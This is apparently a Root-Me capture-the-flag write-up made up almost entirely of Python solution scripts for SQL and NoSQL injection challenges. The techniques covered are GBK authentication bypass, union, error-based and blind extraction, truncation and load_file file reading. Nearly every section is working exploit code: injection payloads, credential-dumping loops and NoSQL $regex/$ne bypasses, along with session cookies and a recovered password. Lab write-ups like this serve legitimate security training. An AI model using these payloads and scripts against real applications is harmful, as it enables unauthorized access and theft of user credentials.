534 words
3 minutes
SQL:NoSQL ROOT-ME

SQL injection - Authentication - GBK#

Solution:#

#!/usr/bin/env python3

import requests

session = requests.session()

url = "http://challenge01.root-me.org:80/web-serveur/ch42/"
cookies = {"PHPSESSID": "d98371dbbf99fdd892c6aed10ba46eb4", "_ga_SRYSKX09J7": "GS1.1.1705855195.3.1.1705855314.0.0.0", "_ga": "GA1.1.1754628006.1705777800"}

data = {"login": "\xbf' or 1=1 -- -", "password": "admin"}

session.post(url, cookies=cookies, data=data, allow_redirects=True)
r = requests.get(url + "logged.php", cookies=cookies)
print(r.text)

SQL injection - String#

Solution:#

#!/usr/bin/env python3
import requests
from bs4 import BeautifulSoup
url = "http://challenge01.root-me.org:80/web-serveur/ch19/?action=recherche"
cookies = {"_ga_SRYSKX09J7": "GS1.1.1705857779.4.1.1705858572.0.0.0", "_ga": "GA1.1.1754628006.1705777800"}

pay = "asd' or id='1' union select password,username from users-- -+"
data = {"recherche": pay}
r = requests.post(url, cookies=cookies, data=data)

soup = BeautifulSoup(r.text, 'html.parser')
beautified_html = soup.prettify()
print(beautified_html)

print(r.text)

SQL injection - Numeric#

Solution:#

import requests
from bs4 import BeautifulSoup

url = "http://challenge01.root-me.org:80/web-serveur/ch18/?action=news&news_id="
cookies = {"_ga_SRYSKX09J7": "GS1.1.1705857779.4.1.1705859466.0.0.0", "_ga": "GA1.1.1754628006.1705777800"}

sql = "2 UNION SELECT 5555,username,password from users"

r = requests.get(url + sql, cookies=cookies)

soup = BeautifulSoup(r.text, 'html.parser')
print(soup.prettify())
print(r.text)

NoSQL injection - Authentication#

Solution:#

#!/usr/bin/env python3

import string
import requests
import re

session = requests.session()

cookies = {"_ga_SRYSKX09J7": "GS1.1.1705857779.4.1.1705860242.0.0.0", "_ga": "GA1.1.1754628006.1705777800"}

for i in string.printable:
    url = f"http://challenge01.root-me.org/web-serveur/ch38/?login[$regex]={i}&pass[$ne]=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    r = session.get(url, cookies=cookies)
    if "Bad username or bad password !" not in r.text:
        matches = re.findall(r'flag{.*?}', r.text)
        for match in matches:
            print(match)
            exit(0)

SQL injection - Error#

Solution:#

#!/usr/bin/env python3
import requests

url = 'http://challenge01.root-me.org/web-serveur/ch34/?action=contents&order=ASC,'

passwords = "p455w0rd_c0l"
usernames = "us3rn4m3_c0l"
tablename = "m3mbr35t4bl3"
for i in range(120):
    r = requests.get(url + f"(CAST((SELECT%20{usernames}%20FROM%20{tablename}%20LIMIT%201%20OFFSET%20{i})%20AS%20int))")
    if "You need to be authenticated to access records" not in r.text:
        print(r.text.replace("</body></html>", "").replace("<html><body>", "").replace("<br>", "\n"))

for i in range(120):
    r = requests.get(url + f"(CAST((SELECT%20{passwords}%20FROM%20{tablename}%20LIMIT%201%20OFFSET%20{i})%20AS%20int))")
    if "You need to be authenticated to access records" not in r.text:
        print(r.text.replace("</body></html>", "").replace("<html><body>", "").replace("<br>", "\n"))

SQL injection - Blind#

Solution:#

#!/usr/bin/env python3
import requests, string

url = "http://challenge01.root-me.org:80/web-serveur/ch10/"
cookies = {"_ga_SRYSKX09J7": "GS1.1.1705863979.6.1.1705865439.0.0.0", "_ga": "GA1.1.1754628006.1705777800"}
username="admin"
password="e2azO93i"

def GetLength(username):
    for length in range(64):
        data = {"username": f"user1' AND (select LENGTH(password) from users where username='{username}' LIMIT 1)={length} --", "password": "z"}
        r = requests.post(url, cookies=cookies, data=data)
        print(f"Trying Length: {length} ")
        if "Welcome" in r.text:
            return length


def GetPass(username, length):
    password = ""
    for index in range(1, length + 1):
        print(password)
        for char in string.printable:
            data = {"username": f"user1' AND (SELECT SUBSTR(password,{index},1) FROM users WHERE username='{username}')='{char}' --", "password": "z"}
            r = requests.post(url, cookies=cookies, data=data)
            print(f"Trying Index: {index}, Char {char}")
            if "Welcome" in r.text:
                password += char
                break
    return password

passwd = GetPass(username, GetLength(username))
print(passwd)


SQL Truncation#

Solution:#

#!/usr/bin/env python3

import requests

## Source Code have: 
# <!--
# CREATE TABLE IF NOT EXISTS user(   
# 	id INT NOT NULL AUTO_INCREMENT,
#     login VARCHAR(12),
#     password CHAR(32),
#     PRIMARY KEY (id));
# -->

url = "http://challenge01.root-me.org:80/web-serveur/ch36/register.php"

user = "admin               hihi" # > 12


data = {"login": user, "password": "sirsirsir"}

r = requests.post(url, data=data)

if "User save" in r.text:
    burp0_url = "http://challenge01.root-me.org:80/web-serveur/ch36/admin.php"
    burp0_data = {"password": "sirsirsir"}
    rr = requests.post(burp0_url, data=burp0_data)
    print(rr.text)

SQL injection - File reading#

Solution:#

#!/usr/bin/env python3
import requests



# Getting The admin encoded credentials
burp0_url = "http://challenge01.root-me.org:80/web-serveur/ch31/?action=members&id=1%20AND%201=2%20UNION%20ALL%20SELECT%20null,concat_ws(0x3a,member_id,member_login,member_password,member_email),null,version()%20from%20member--%20-+"

# r = requests.get(burp0_url)


# Reading The index.php to decode The password 
file_to_read = "/challenge/web-serveur/ch31/index.php"
file_to_read_hex = file_to_read.encode().hex().upper()

payload = f" AND 1=2 UNION SELECT 1,2,3,load_file(0x{file_to_read_hex})--"

url = "http://challenge01.root-me.org:80/web-serveur/ch31/?action=members&id=1 " + payload
r = requests.get(url)
# print(r.text)

# decoding the password Using The key
import base64
def stringxor(o1, o2):
    res = ''
    for i in range(len(o1)):
        res += chr(ord(o1[i]) ^ ord(o2[i]))
    return res

key = "c92fcd618967933ac463feb85ba00d5a7ae52842" # from index.php
encrypted_data = "VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA==" # from the database

decoded_data = base64.b64decode(encrypted_data).decode('utf-8')
result = stringxor(key, decoded_data)

# print(result)

image